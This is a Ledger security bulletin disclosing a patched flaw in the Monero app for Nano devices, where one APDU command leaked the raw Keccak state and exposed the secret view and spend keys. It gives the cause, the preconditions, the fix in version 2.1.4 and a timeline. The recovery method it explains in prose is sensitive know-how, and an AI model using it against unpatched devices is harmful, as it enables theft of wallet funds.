Ledger Security Bulletin 022
Monero secret key recovery through Keccak state exposure
4 June 2026: Monero secret key recovery through Keccak state exposure.
Summary
A vulnerability was identified in the Monero app for Ledger Nano devices where the INS_GET_CHACHA8_PREKEY APDU handler leaked the full 200-byte internal Keccak permutation state instead of a properly derived prekey. Because the Keccak-f permutation is publicly known and invertible, an attacker able to send APDUs to the device could recover the secret view key and secret spend key. The command was reachable without user confirmation.
The vulnerability is fixed in Monero app version 2.1.4.
Description
The Monero app exposes an APDU command INS_GET_CHACHA8_PREKEY used to derive a ChaCha8 prekey for wallet cache encryption. The vulnerable implementation concatenated the secret view key a, the secret spend key b, and a single padding byte 0x8c into a 65-byte buffer, then applied the Keccak-f permutation via monero_keccak_F.
However, instead of returning the intended derived key material, the handler returned the entire 200-byte internal Keccak state (G_monero_vstate.keccakF.acc) to the host.
Keccak-f[1600] is a public, bijective permutation operating on a 1600-bit (200-byte) state. When the input fits within a single absorbed block — as is the case here with only 65 bytes of input — the full post-permutation state fully determines the pre-permutation state. Since the initial state is zeroed, the pre-permutation state is simply the padded input itself: a || b || 0x8c || 0x00.... An attacker receiving the 200-byte response can therefore recover both secret keys directly.
Impact
Exploitation requires that the vulnerable version of the Monero app is installed on the device, the device is unlocked, and the app is open. Additionally, the host machine must be compromised in order to send the malicious APDU command to the app. Under these conditions, an attacker could silently extract both the secret view key and the secret spend key of the user’s Monero wallet without any on-screen confirmation. It should be noted that this attack scenario requires a significant number of prerequisites to be met, which considerably limits its practical exploitability.
Remediation
The vulnerability has been fixed in the Monero app version 2.1.4. The fix introduces the following changes:
- The prekey derivation now uses SHAKE256 with a proper squeeze operation, ensuring the output is a cryptographically derived value rather than a raw permutation state.
- A domain separation label is prepended to the input.
- Only the secret view key is used as input to the derivation, rather than both secret keys.
- Sensitive intermediate buffers are explicitly cleared after use.
Users of the Monero app are strongly recommended to update to version 2.1.4 or later.
Timeline
| Date | Action |
|---|---|
| 16 March 2026 | Vulnerability identified during internal security review. |
| 19 March 2026 | Fix developed and merged into a temporary internal repository to ensure deployment before disclosure. |
| 20 March 2026 | Monero app version 2.1.4 released with the fix. |
| 3 June 2026 | Fix open-sourced |
| 4 June 2026 | Security bulletin published. |